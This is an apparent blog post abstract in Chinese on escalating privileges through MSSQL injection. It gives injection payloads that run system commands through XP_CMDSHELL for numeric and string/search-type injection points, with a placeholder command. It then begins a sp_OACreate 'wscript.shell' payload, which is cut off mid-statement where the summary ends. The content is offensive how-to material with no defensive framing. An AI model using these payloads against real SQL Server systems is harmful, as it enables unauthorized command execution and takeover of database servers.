摘要:
MSSQL注入提权思路:SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)相关SQL语句XP_CMDSHELL:数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--Sp_OACreate:数字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oameth 阅读全文